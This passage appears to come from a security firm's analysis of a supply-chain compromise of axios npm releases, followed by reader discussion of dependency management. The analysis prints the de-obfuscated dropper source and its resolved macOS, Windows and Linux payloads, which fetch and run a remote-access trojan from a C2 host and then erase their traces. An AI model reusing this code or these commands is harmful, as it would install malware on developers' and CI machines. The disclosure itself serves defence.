+ "plain-crypto-js": "^4.2.1"
}
Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the "prepare": "husky" script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project's standard release tooling, which would have re-added the husky prepare script.
The same analysis applies to axios@0.30.3 → axios@0.30.4:
# --- axios/package.json (0.30.3)
# +++ axios/package.json (0.30.4)
- "version": "0.30.3",
+ "version": "0.30.4",
"dependencies": {
"follow-redirects": "^1.15.4",
"form-data": "^4.0.4",
"proxy-from-env": "^1.1.0",
+ "plain-crypto-js": "^4.2.1"
}
Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.
setup.js - Static Analysissetup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers.
All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:
_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript’s Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:
charCode XOR key[(7 × r × r) % 10] XOR 333
_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.
The dropper’s entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033
StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:
stq[0] → "child_process" // shell execution
stq[1] → "os" // platform detection
stq[2] → "fs" // filesystem operations
stq[3] → "http://sfrclak.com:8000/" // C2 base URL
stq[5] → "win32" // Windows platform identifier
stq[6] → "darwin" // macOS platform identifier
stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
stq[13] → "package.json" // deleted after execution
stq[14] → "package.md" // clean stub renamed to package.json
stq[15] → ".exe"
stq[16] → ".ps1"
stq[17] → ".vbs"
The complete attack path from npm install to C2 contact and cleanup, across all three target platforms.

setup.jsWith all strings decoded, the dropper's full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.
// setup.js — de-obfuscated and annotated
// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
const _entry = function(campaignId) {
try {
// Load Node.js built-in modules via decoded string table
const fs = require("fs"); // stq[2]
const os = require("os"); // stq[1]
const { execSync } = require("child_process"); // stq[0]
// Build the full C2 URL: base + campaign ID
// stq[3] = "http://sfrclak.com:8000/"
const c2Url = "http://sfrclak.com:8000/" + campaignId;
// → "http://sfrclak.com:8000/6202033"
// Detect the operating system
const platform = os.platform(); // "darwin", "win32", or other
const tmpDir = os.tmpdir(); // "/tmp" on Linux/macOS, "%TEMP%" on Windows
// os.type(), os.release(), os.arch() are called but results discarded —
// likely sends them via the POST body or they are used in the stage-2
os.type(); os.release(); os.arch();
let execCommand = "";
// ─────────────────────────────────────────────────
// BRANCH 1: macOS (darwin)
// ─────────────────────────────────────────────────
if (platform === "darwin") {
const scriptPath = tmpDir + "/" + campaignId; // /tmp/6202033
const appleScript = `
set {a, s, d} to {"", "${c2Url}", "/Library/Caches/com.apple.act.mond"}
try
do shell script "curl -o " & d & a & " -d packages.npm.org/product0" & " -s " & s & " && chmod 770 " & d & " && /bin/zsh -c \\"" & d & " " & s & " &\\" &> /dev/null"
end try
do shell script "rm -rf ${scriptPath}"`;
fs.writeFileSync(scriptPath, appleScript);
execCommand = `nohup osascript "${scriptPath}" > /dev/null 2>&1 &`;
// ─────────────────────────────────────────────────
// BRANCH 2: Windows (win32)
// ─────────────────────────────────────────────────
} else if (platform === "win32") {
const psPath = execSync("where powershell").toString().trim();
const wtPath = process.env.PROGRAMDATA + "\\wt.exe";
if (!fs.existsSync(wtPath)) {
fs.copyFileSync(psPath, wtPath);
// Creates a persistent copy of PowerShell. wt.exe is Windows Terminal's
// binary name — a legitimate-looking process in %PROGRAMDATA%.
}
const ps1Path = tmpDir + "\\" + campaignId + ".ps1"; // %TEMP%\6202033.ps1
const vbsPath = tmpDir + "\\" + campaignId + ".vbs"; // %TEMP%\6202033.vbs
const vbScript = `
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c curl -s -X POST -d ""packages.npm.org/product1"" ""${c2Url}"" > ""${ps1Path}"" & ""${wtPath}"" -w hidden -ep bypass -file ""${ps1Path}"" ""${c2Url}"" & del ""${ps1Path}"" /f", 0, False`;
fs.writeFileSync(vbsPath, vbScript);
execCommand = `cscript "${vbsPath}" //nologo && del "${vbsPath}" /f`;
// ─────────────────────────────────────────────────
// BRANCH 3: Linux / other
// ─────────────────────────────────────────────────
} else {
execCommand = `curl -o /tmp/ld.py -d packages.npm.org/product2 -s ${c2Url} && nohup python3 /tmp/ld.py ${c2Url} > /dev/null 2>&1 &`;
// curl and nohup chained with &&: nohup only runs if curl succeeded.
// If the C2 is unreachable, chain silently fails — npm install still exits 0.
}
// execSync is blocking, but all three commands return immediately because
// the real work is detached to background processes (nohup / cscript 0,False)
execSync(execCommand);
// ─────────────────────────────────────────────────
// ANTI-FORENSICS: cover tracks
// ─────────────────────────────────────────────────
const selfPath = __filename;
fs.unlink(selfPath, () => {}); // 1. Delete setup.js itself
fs.unlink("package.json", () => {}); // 2. Delete malicious package.json
fs.rename("package.md", "package.json", () => {}); // 3. Install clean v4.2.0 stub
} catch(e) {
// Silent catch — any error (C2 unreachable, permission denied, etc.)
// is swallowed completely. npm install always exits with code 0.
// The developer never sees any indication that anything went wrong.
}
};
// Entry point — "6202033" is the campaign/tracking ID
_entry("6202033");
try/catch. The entire _entry() function is wrapped in a single try/catch that swallows all errors with an empty handler. If the C2 is unreachable, if the user has no write permission to the target path, or if any step fails, the dropper exits silently and npm install completes with exit code 0. There is no error output, no warning, nothing.execSync is blocking, but the payloads are not. The dropper uses execSync(execCommand) — a synchronous, blocking call. However, all three platform execution commands end with & (Linux/macOS) or use cscript ... 0, False (Windows), which immediately detach the process and return. So execSync returns almost instantly — the dropper doesn't block npm install for more than a fraction of a second.&& chain on Linux is a liveness check. curl ... && nohup python3 ... — if curl fails (C2 unreachable, no network), the nohup command never executes. This ensures npm install never fails, even when the C2 is unavailable.copyFileSync conditional creates persistence. if (!fs.existsSync(wtPath)) { fs.copyFileSync(psPath, wtPath); } — the copy only runs if %PROGRAMDATA%\wt.exe does not already exist. Once created, this file persists across reinstalls and reboots. Even if the victim removes plain-crypto-js and reinstalls clean dependencies, wt.exe remains in %PROGRAMDATA% as a dormant copy of PowerShell available to any future payload.On macOS (darwin), the dropper writes an AppleScript to /tmp/6202033 and executes it silently via nohup osascript. The AppleScript contacts C2 with POST body packages.npm.org/product0, downloads the macOS RAT binary, saves it to /Library/Caches/com.apple.act.mond (mimicking an Apple system cache file), makes it executable (chmod 770), and launches it via /bin/zsh. The script then deletes itself.
The name com.apple.act.mond likely abbreviates "Activity Monitor Daemon" to blend with legitimate Apple processes using Apple's reverse-DNS daemon naming convention.
On Windows (win32):
where powershell to locate the binary%PROGRAMDATA%\wt.exe (disguised as Windows Terminal).vbs) to temp directory, executed via cscript //nologo in a hidden cmd.exe windowcurl to fetch the PowerShell stage-2 to %TEMP%\6202033.ps1, executes it with -WindowStyle Hidden and -ExecutionPolicy Bypass, then self-deletesPersistent artifact: %PROGRAMDATA%\wt.exe (copy of PowerShell).
On Linux and all other platforms:
curl -o /tmp/ld.py \
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 > /dev/null 2>&1 &
C2 returns a Python RAT script saved to /tmp/ld.py and executed in background, detached from the npm process tree.
The following are the complete, fully resolved payloads as they execute on victim machines, with all template placeholders replaced with actual values using campaign ID 6202033 and C2 base URL http://sfrclak.com:8000/.
/tmp/6202033-- Written to: /tmp/6202033
-- Executed via: nohup osascript "/tmp/6202033" > /dev/null 2>&1 &
-- This file is deleted by the script itself in the final do shell script line
set {a, s, d} to {"", "http://sfrclak.com:8000/6202033", "/Library/Caches/com.apple.act.mond"}
try
do shell script "curl -o " & d & a & " -d packages.npm.org/product0" & " -s " & s & " && chmod 770 " & d & " && /bin/zsh -c \"" & d & " " & s & " &\" &> /dev/null"
end try
do shell script "rm -rf /tmp/6202033"
When executed, this AppleScript expands to the following shell command:
curl -o /Library/Caches/com.apple.act.mond \
-d packages.npm.org/product0 \
-s http://sfrclak.com:8000/6202033 \
&& chmod 770 /Library/Caches/com.apple.act.mond \
&& /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &" \
>& /dev/null
%TEMP%\6202033.vbs' Written to: %TEMP%\6202033.vbs
' Executed via: cscript "%TEMP%\6202033.vbs" //nologo && del "%TEMP%\6202033.vbs" /f
' objShell.Run arg 2=0 (hidden window), arg 3=False (don't wait for completion)
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c curl -s -X POST -d ""packages.npm.org/product1"" ""http://sfrclak.com:8000/6202033"" > ""%TEMP%\6202033.ps1"" & ""powershell.exe"" -w hidden -ep bypass -file ""%TEMP%\6202033.ps1"" ""http://sfrclak.com:8000/6202033"" & del ""%TEMP%\6202033.ps1"" /f", 0, False
execSync shell command# Executed directly via execSync() in Node.js — no intermediate file
curl -o /tmp/ld.py \
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 > /dev/null 2>&1 &
The & at the end detaches nohup from the shell started by execSync, causing it to be re-parented to PID 1 (init) when that shell exits, as confirmed in the Harden-Runner process events where nohup (PID 2400) shows ppid: 1.
The dropper's if/else if/else chain covers darwin, win32, and everything else (Linux). There is no explicit check for "linux" — anything that is not macOS or Windows falls through to the Linux command. This means the dropper also targets FreeBSD, Android (Node.js on Termux), and any other Unix-like system where curl and python3 are available. Container environments running Node.js are equally affected.
Each platform sends a distinct POST body to the same C2 endpoint:
packages.npm.org/product0packages.npm.org/product1packages.npm.org/product2The packages.npm.org/ prefix attempts to make traffic appear as benign npm registry communication in network logs and SIEMs.

After launching the platform-specific payload, setup.js performs three forensic cleanup steps in sequence:
fs.unlink(__filename) removes setup.js from node_modules/plain-crypto-js/package.json — removes the file containing "postinstall": "node setup.js"package.md to package.json — the pre-staged clean stub (reporting version 4.2.0, no scripts) replaces the malicious manifest
Post-infection inspection of node_modules/plain-crypto-js/package.json shows a completely clean manifest. Running npm audit reveals nothing. The only persistent evidence is the existence of the node_modules/plain-crypto-js/ directory itself — this package never appeared in any legitimate axios version.
Why the directory presence still matters: Even after cleanup, the existence of node_modules/plain-crypto-js/ is sufficient evidence of compromise — this package is not a dependency of any legitimate axios version. If you find this directory, the dropper ran.
Static analysis of the obfuscated dropper told us what the malware intended to do. To confirm it actually executes as designed, we installed axios@1.14.1 inside a GitHub Actions runner instrumented with StepSecurity Harden-Runner in audit mode. Harden-Runner captures every outbound network connection, every spawned process, and every file write at the kernel level — without interfering with execution in audit mode, giving us a complete ground-truth picture of what happens the moment npm install runs.
The full Harden-Runner insights for this run are publicly accessible:
app.stepsecurity.io/github/actions-security-demo/compromised-packages/actions/runs/23776116077

The network event log contains two outbound connections to sfrclak.com:8000 — but what makes this particularly significant is when they occur:
curl → sfrclak.com:8000 • calledBy: infra nohup → sfrclak.com:8000 • calledBy: infraTwo things stand out immediately:
curl, PID 2401) fires 1.1 seconds into the npm install — at 01:30:51Z, just 2 seconds after npm install began at 01:30:49Z. The postinstall hook triggered, decoded its strings, and was making an outbound HTTP connection to an external server before npm had finished resolving all dependencies.nohup, PID 2400) occurs 36 seconds later, in an entirely different workflow step — “Verify axios import and version.” The npm install step was long finished. The malware had persisted into subsequent steps, running as a detached background process. This is the stage-2 Python payload (/tmp/ld.py) making a callback — alive and independent of the process that spawned it.Why both connections show calledBy: "infra": When Harden-Runner can trace a network call to a specific Actions step through the runner process tree, it labels it "runner". The "infra" label means the process making the connection could not be attributed to a specific step — because the dropper used nohup ... & to detach from the process tree. The process was deliberately orphaned to PID 1 (init), severing all parent-child relationships. This is the malware actively evading process attribution.
Harden-Runner captures every execve syscall. The raw process events reconstruct the exact execution chain from npm install to C2 contact:
PID 2366 bash /home/runner/work/_temp/***.sh [01:30:48.186Z]
└─ PID 2380 env node npm install axios@1.14.1 [01:30:49.603Z]
└─ PID 2391 sh -c "node setup.js" [01:30:50.954Z]
│ cwd: node_modules/plain-crypto-js ← postinstall hook fires
└─ PID 2392 node setup.js [01:30:50.955Z]
│ cwd: node_modules/plain-crypto-js
└─ PID 2399 /bin/sh -c "curl -o /tmp/ld.py \ [01:30:50.978Z]
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py \
http://sfrclak.com:8000/6202033 \
> /dev/null 2>&1 &"
PID 2401 curl -o /tmp/ld.py -d packages.npm.org/product2 [01:30:50.979Z]
ppid: 2400 ← child of nohup
PID 2400 nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 [01:31:27.732Z]
ppid: 1 ← ORPHANED TO INIT — detached from npm process tree
The process tree confirms the exact execution chain decoded statically from setup.js. Four levels of process indirection separate the original npm install from the C2 callback: npm → sh → node → sh → curl/nohup. The nohup process (PID 2400) reporting ppid: 1 is the technical confirmation of the daemonization technique — by the time npm install returned successfully, a detached process was already running /tmp/ld.py in the background.
The file event log captures every file write by PID. The plain-crypto-js/package.json entry shows two writes from two different processes — directly confirming the anti-forensics technique described in static analysis:
File: node_modules/plain-crypto-js/package.json
Write 1 — pid=2380 (npm install) ts=01:30:50.905Z
Malicious package.json written to disk during install.
Contains: { "postinstall": "node setup.js" }
Write 2 — pid=2392 (node setup.js) ts=01:31:27.736Z [+36s]
Dropper overwrites package.json with clean stub from package.md.
Contains: version 4.2.0 manifest, no scripts, no postinstall.
The 36-second gap between the two writes is the execution time of the dropper — it wrote the second file only after successfully launching the background payload. Harden-Runner flagged this as a “Source Code Overwritten” file integrity event. Post-infection, any tool that reads node_modules/plain-crypto-js/package.json will see the clean manifest. The write event log is the only runtime artifact that proves the swap occurred.

Malicious npm Packages
Network Indicators
File System Indicators
Attacker-Controlled Accounts
Safe Version Reference
Step 1 – Check for the malicious axios versions in your project:
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"
Step 2 – Check for plain-crypto-js in node_modules:
ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"
If setup.js already ran, package.json inside this directory will have been replaced with a clean stub. The presence of the directory alone is sufficient evidence the dropper executed.
Step 3 – Check for RAT artifacts on affected systems:
# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"
# Linux
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"
"COMPROMISED"
# Windows (cmd.exe)
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED
Step 4 – Check CI/CD pipelines:
Review pipeline logs for any npm install executions that may have pulled axios@1.14.1 or axios@0.30.4. Any pipeline that installed either version should be treated as compromised and all injected secrets rotated immediately.
1. Downgrade axios to a clean version and pin it.
npm install axios@1.14.0 # for 1.x users
npm install axios@0.30.3 # for 0.x users
2. Add an overrides block to prevent transitive resolution back to the malicious versions
{
"dependencies": { "axios": "1.14.0" },
"overrides": { "axios": "1.14.0" },
"resolutions": { "axios": "1.14.0" }
}
3. Remove plain-crypto-js from node_modules.
rm -rf node_modules/plain-crypto-js
npm install --ignore-scripts
4. If a RAT artifact is found: treat the system as fully compromised. Do not attempt to clean in place - rebuild from a known-good state. Rotate all credentials on any system where the malicious package ran: npm tokens, AWS access keys, SSH private keys, cloud credentials (GCP, Azure), CI/CD secrets, and any values present in .env files accessible at install time.
5. Audit CI/CD pipelines for runs that installed the affected versions. Any workflow that executed npm install with these versions should have all injected secrets rotated.
6. Use --ignore-scripts in CI/CD as a standing policy to prevent postinstall hooks from running during automated builds:
npm ci --ignore-scripts
7. Block C2 traffic at the network/DNS layer as a precaution on any potentially exposed system
# Block via firewall (Linux)
iptables -A OUTPUT -d 142.11.206.73-j DROP
# Block via /etc/hosts (macOS/Linux)
echo "0.0.0.0 sfrclak.com" >> /etc/hosts
Harden-Runner is a purpose-built security agent for CI/CD runners.
It enforces a network egress allowlist in GitHub Actions, restricting outbound network traffic to only allowed endpoints. Both DNS and network-level enforcement prevent covert data exfiltration. The C2 callback to sfrclak.com:8000 and the payload fetch in the postinstall script would have been blocked at the network level before the RAT could be delivered.
Harden-Runner also automatically logs outbound network traffic per job and repository, establishing normal behavior patterns and flagging anomalies. This reveals whether malicious postinstall scripts executed exfiltration attempts or contacted suspicious domains, even when the malware self-deletes its own evidence afterward. The C2 callback to sfrclak.com:8000 was flagged as anomalous because it had never appeared in any prior workflow run.

Supply chain attacks like this one do not stop at the CI/CD pipeline. The malicious postinstall script in plain-crypto-js@4.2.1 drops a cross-platform RAT designed to run on the developer's own machine, harvesting credentials, SSH keys, cloud tokens, and other secrets from the local environment. Every developer who ran npm install with the compromised axios version outside of CI is a potential point of compromise.
StepSecurity Dev Machine Guard gives security teams real-time visibility into npm packages installed across every enrolled developer device. When a malicious package is identified, teams can immediately search by package name and version to discover all impacted machines, as shown below with axios@1.14.1 and axios@0.30.4.

Newly published npm packages are temporarily blocked during a configurable cooldown window. When a PR introduces or updates to a recently published version, the check automatically fails. Since most malicious packages are identified within 24 hours, this creates a crucial safety buffer. In this case, plain-crypto-js@4.2.1 was published hours before the axios releases, so any PR updating to axios@1.14.1 or axios@0.30.4 during the cooldown period would have been blocked automatically.

StepSecurity maintains a real-time database of known malicious and high-risk npm packages, updated continuously, often before official CVEs are filed. If a PR attempts to introduce a compromised package, the check fails and the merge is blocked. Both axios@1.14.1 and plain-crypto-js@4.2.1 were added to this database within minutes of detection.

Search across all PRs in all repositories across your organization to find where a specific package was introduced. When a compromised package is discovered, instantly understand the blast radius: which repos, which PRs, and which teams are affected. This works across pull requests, default branches, and dev machines.

AI Package Analyst continuously monitors the npm registry for suspicious releases in real time, scoring packages for supply chain risk before you install them. In this case, both axios@1.14.1 and plain-crypto-js@4.2.1 were flagged within minutes of publication, giving teams time to investigate, confirm malicious intent, and act before the packages accumulated significant installs. Alerts include the full behavioral analysis, decoded payload details, and direct links to the OSS Security Feed.

StepSecurity has published a threat intel alert in the Threat Center with all relevant links to check if your organization is affected. The alert includes the full attack summary, technical analysis, IOCs, affected versions, and remediation steps, so teams have everything needed to triage and respond immediately. Threat Center alerts are delivered directly into existing SIEM workflows for real-time visibility.

We want to thank the axios maintainers and the community members who quickly identified and triaged the compromise in GitHub issue #10604. Their rapid response, collaborative analysis, and clear communication helped the ecosystem understand the threat and take action within hours.
We also want to thank GitHub for swiftly suspending the compromised account and npm for quickly unpublishing the malicious axios versions and placing a security hold on plain-crypto-js. The coordinated response across maintainers, GitHub, and npm significantly limited the window of exposure for developers worldwide.
How do you handle updating dependencies then?
People are trying to automate the act of programming itself, with AI, let alone all the bits and pieces of build processes and maintenance.
And the chances of staying undetected are higher if nobody is installing until the delay time ellapses.
It's the same as not scheduling all cronjobs to midnight.
Updating packages takes longer, but we try to keep packages to a minimum so it ends up not being that big deal.
But raw.githubusercontent.com still contains code and now the attacker can publish the code he wants no!?
Don't get me wrong: I love the idea to secure as much as possible. I'm running VMs and containerizing and I eat firewalling rules for breakfast, my own unbound DNS with hundreds of thousands (if not millions) of domains blocked, etc. I'm not the "YOLO" kind of guy.
But I don't understand what's that different between raw.githubusercontent.com and github.com? Is it for exploits that are not directly in the source code? Can you explain a bit more?
"Zero deps. One file." People prefer hand-written comments over LLM-written ones.
"Already detects the hijacked maintainer email on the current safe version." You simply flag all proton email addresses.
To be honest - and I can't really believe I'm saying it - what I really want is something more like Android permissions. (Except more granular file permissions, which Android doesn't do at all well.) Like: start with nothing, app is requesting x access, allow it this time; oh alright fine always allow it. Central place to manage it later. Etc.
1- automatically add bearer tokens to requests rather than manually specifying them every single time
2- automatically dispatch some event or function when a 401 response is returned to clear the stale user session and return them to a login page.
There's no reason to repeat this logic in every single place you make an API call.
Likewise, every response I get is JSON. There's no reason to manually unwrap the response into JSON every time.
Finally, there's some nice mocking utilities for axios for unit testing different responses and error codes.
You're either going to copy/paste code everywhere, or you will write your own helper functions and never touch fetch directly. Axios... just works. No need to reinvent anything, and there's a ton of other handy features the GP mentioned as well you may or may not find yourself needing.
Most npm CVEs are stuff like DDoS vulnerabilities, and you should have mitigations for those in place for at the infra-level anyway (e.g. request timeouts, rate limits, etc), or you are pretty much guaranteed to be cooked sooner or later anyway. The really dangerous stuff like arbitrary command execution from a library that takes end user input is much much more rare. The most recent big one I remember is React2shell.
Number 2 hasn't been much of an issue for a long time. npm doesn't allow unpublishing package after 72 hours (apart from under certain rare conditions).
Don't know about number 3. Would feel to me that if you have something running that can modify lockfile, they can probably also modify the chekced-in tars.
I can see how zero-installs are useful under some specific constraints where you want to minimize dependencies to external services, e.g. when your CI runs under strict firewalls. But for most, nah, not worth it.
It's what we call in France "la fête du slip".
PS: that's one reason I try to use git submodules in my Common Lisp projects instead of QuickLisp, because I really see the size of my deptree this way.
I know 90% of people I've worked with will never know these options exist.
I like to think of it like working with dangerous chemicals in the lab. Back in the days, people were sloppy and eventually got cancer. Then dangers were recognized and PPE was developed and became a requirement.
We are now at the stage in software development where we are beginning to recognizing the hazards and developing + mandating use of proper PPE.
A couple of years ago, pip started refusing to install packages outside of a virtualenv. I'm guessing/hoping package managers will start to have an opt-in flag you can set in a system-wide config file, such that they refuse to run outside of a sandbox.
That way Han Solo can make sense in the infamous quote.
EDIT: even Gemini gets this wrong:
> In Star Wars, a parsec is a unit of distance, not time, representing approximately 3.26 light-years
(Hope your timezones and tzdata correctly identifies Easter bank holiday as non-workdays)
Getting zero day patches 7 days later if no proper monitoring about important patches or if this specific patch is not in the important list. Always a tradeoff.
find / -type f -path '*/node_modules/axios/package.json' \
-exec grep -Pl '"version"\s*:\s*"(1\.14\.1|0\.30\.4)"' {} + 2>/dev/null
Let’s not encourage people to respond to security incidents by… copy/pasting random commands they don’t understand.Because all mainstream packages are published via CI/CD pipeline not by an MFA'd individual uploading a GZIP to npm.com
This became evident, what, perhaps a few years ago? Probably since childhood for some users here but just wondering what the holdup is. Lots of bad press could be avoided, or at least a little.
Yes, they cannot include everything, but enough that you do not _need_ third party packages.
For C#, I think they achieved that.
The amount of time defining same data structures over and over again vs `pip install requests` with well defined data structures.
Yes less deps people need the better but it doesn't fix trhe core problem. Sharing and distrib uting code is a key tenant of being able to write modern code.
Which dependency? It sounds like you are assuming some specific scenario, whereas the fix can take many forms. In immediate term, the quickest step could be to simply disable some feature. A later step may be vendoring in a safe implementation.
The registry doesn’t need to be actually down for you, either; the necessary condition is that your CI infrastructure can’t reach it.
> cases where npm CVEs must be patched with such urgency or bad things will happen are luckily very rare, in my experience.
Not sure what you mean by “npm CVEs”. The registry? The CLI tool?
As I wrote, if you are running compromised software in production, you want to fix it ASAP. In first moments you may not even know whether bad things will happen or not, just that you are shipping malicious code to your users. Even if you are lucky enough to determine with 100% confidence (putting your job on the line) that the compromise is inconsequential, you don’t want to keep shipping that code for another hour because your install step fails due to a random CI infra hiccup making registry inaccessible (as happened in my experience at least half dozen times in years prior, though luckily not in a circumstance where someone attempted to push an urgent security fix). Now imagine it’s not a random hiccup but part of a coordinated targeted attack, and somehow it becomes something anticipated.
> Number 2 hasn't been much of an issue for a long time. npm doesn't allow unpublishing package after 72 hours (apart from under certain rare conditions).
Those rare conditions exist. Also, you are making it sound as if the registry is infallible, and no humans and/or LLMs there accept untrusted input from their environment.
The key aspect of modern package managers, when used correctly, is that even when the registry is compromised you are fine as long as integrity check crypto holds up and you hold on to your pre-compromise dependency tree. The latter is not a technical problem but a human problem, because conditions can be engineered in which something may slip past your eyes. If this slip-up can be avoided at little to no cost—in fact, with benefits, since zero-installs shortens CI times, and therefore time-to-fix, due to dramatically shorter or fully eliminated install step—it should be a complete no-brainer.
> Don't know about number 3. Would feel to me that if you have something running that can modify lockfile, they can probably also modify the chekced-in tars.
As I wrote, I suspect it’d complicate such attacks or make them easier to spot, not make them impossible.
I'd argue that it is ideal, in the sense that it's the sweet spot for a general config file format to limit itself to simple, widely reusable building blocks. Supporting more advanced types can get in the way of this.
Programs need their own validation and/or parsing anyway, since correctness depends on program-specific semantics and usually only a subset of the values of a more simply expressed type is valid. That same logic applies across inputs: config may come from files, CLI args, legacy formats, or databases, often in different shapes. A single normalization and validation path simplifies this.
General formats must also work across many languages with different type systems. More complex types introduce more possible representations and therefore trade-offs. Even if a file parser implements them correctly (and consistently with other such parsers), it must choose an internal form that may not match what a program needs, forcing extra, less standard transformation and adding complexity on both sides for little gain.
Because acceptable values are defined by the program, not the file, a general format cannot fully specify them and shouldn’t try. Its role is to be a medium and provide simple, human-usable (for textual formats), widely supported types, avoid forcing unnecessary choices, and get out of the way.
All in all, I think it can be more appropriate for a program to pick a parsing library for a more complex type, than to add one consistently to all parsers of a given file format.
IMO interceptors are bad. they hide what might get transformed with the API call at the place it is being used.
> Likewise, every response I get is JSON. There's no reason to manually unwrap the response into JSON every time.
This is not true unless you are not interfacing with your own backends. even then why not just make a helper that unwraps as json by default but can be passed an arg to parse as something else
I removed the locks from all the doors, now entering/exiting is 87% faster! After removing all the safety equipment, our vehicles have significantly improved in mileage, acceleration and top speed!
> Few languages have good models for evolving their standard library
Can you name some examples?You might want to elaborate on the "etc.", since HTML updates are glacial.
(The classic example being passwords: we wouldn’t need MFA is everybody just “got good” and used strong/unique passwords everywhere. But that’s manifestly unrealistic, so instead we use our discipline budget on getting people to use password managers and phishing-resistant MFA.)
Django and Spring
There's clearly merit to both sides, but personally I think a major underlying cause is that libraries are trusted. Obviously that doesn't match reality. We desperately need a permission system for libraries, it's far harder to sneak stuff in when doing so requires an "adds dangerous permission" change approval.
start_at = 2026-05-27T07:32:00Z # RFC 3339
start_at = 2026-05-27 07:32:00Z # readable
We should extend it with durations: timeout = PT15S # RFC 3339
And like for datetimes, we should have a readable variant: timeout = 15s # can omit "P" and "T" if not ambiguous, can use lowercase specifiers
Edit: discussed in detail here: https://github.com/toml-lang/toml/issues/514The entire history of malware lol
Urgent fix, patch released, invisible to dev team cause they put in a 7 day wait. Now our app is vulnerable for up to 7 days longer than needed (assuming daily deploys. If less often, pad accordingly). Not a great excuse as to why the company shipped an "updated" version of the app with a standing CVE in it. "Sorry we were blinded to the critical fix because set an arbitrary local setting to ignore updates until they are 7 days old". I wouldn't fire people over that, but we'd definitely be doing some internal training.
For example, esbuild and typescript 7 split binaries for different systems and architectures into separate packages, and rely on your package manager to pull the correct one.
It's like the difference in protecting your home from burglars and foreign nation soldiers. Both are technically invaders to your home, but the scope is different, and the solutions are different.
It’s not needed anymore.
Why wouldn't that work well with legacy projects? In fact, the projects I was a part of that I'd call legacy nowadays, was in fact built by copy-and-pasting .js libraries into a "vendor/" directory, and that's how we shipped it as well, this was in the days before Bower (which was the npm of frontend development back in the day), vendoring JS libs was standard practice, before package managers became used in frontend development too.
Not sure why it wouldn't work, JavaScript is a very moldable language, you can make most things work one way or another :)(
With Bun I use less dependencies from NPM than I used from Nuget with .NET to build minimal apis. For example the pg driver.
just shipping from npm crap is essentially the equivelant of running your production code base against Arch AUR pkgbuilds.
fetch responses have a .json() method. It's literally the first example in MDN: https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/U...
It's literally easier than not using JSON because I have to think about if I want `repsponse.text()` or `response.body()`.
You still have multiple programming languages preinstalled on your OS, no matter which one it is.
Yes - the postinstall hook attack vector goes away. You can do SHA pinning since Git's content addressing means that SHA is the hash of the content. But then your "lockfile" equivalent is just... a list of commit SHAs scattered across import statements in your source? Managing that across a real dependency tree becomes a nightmare.
This is basically what Deno's import maps tried to solve, and what they ended up with looked a lot like a package registry again.
At least npm packages have checksums and a registry that can yank things.
Package managers should do the same thing
I'd contrast Python with Go, which has an amazing stdlib for the domains that Go targets. This last part is key--Go has a more focused scope than Python, and that makes it easier for its stdlib to succeed.
const myfetch = async (req, options) => {
let options = options || {};
options.headers = options.headers || {};
options.headers['Authorization'] = token;
let res = await fetch(new Request(req, options));
if (res.status == 401) {
// do your thing
throw new Error("oh no");
}
return res;
}
Convenience is a thing, but it doesn't require a massive library.The PNG spec [7] has been updated several times in 1996, 1998, 1999, and 2025.
The XPath spec [8] has multiple versions: 1.0 (1999), 2.0 (2007), 3.0 (2014), and 3.1 (2017), with 4.0 in development.
The RDF spec [9] has multiple versions: 1.0 (2004), and 1.1 (2014). Plus the related specs and their associated versions.
The schema.org metadata standard [10] is under active development and is currently on version 30.
[1] https://developer.mozilla.org/en-US/docs/Web/HTML/Reference/... (New)
[2] https://web.dev/baseline/2025 -- popover API, plain text content editable, etc.
[3] https://web.dev/baseline/2024 -- exclusive accordions, declarative shadow root DOM
[4] https://web.dev/baseline/2023 -- inert attribute, lazy loading iframes
[5] https://developer.mozilla.org/en-US/docs/Web/HTML/Reference/... (Baseline 2023)
[6] https://developer.mozilla.org/en-US/docs/Web/HTML/Reference/... (2020)
[7] https://en.wikipedia.org/wiki/PNG
[8] https://en.wikipedia.org/wiki/XPath
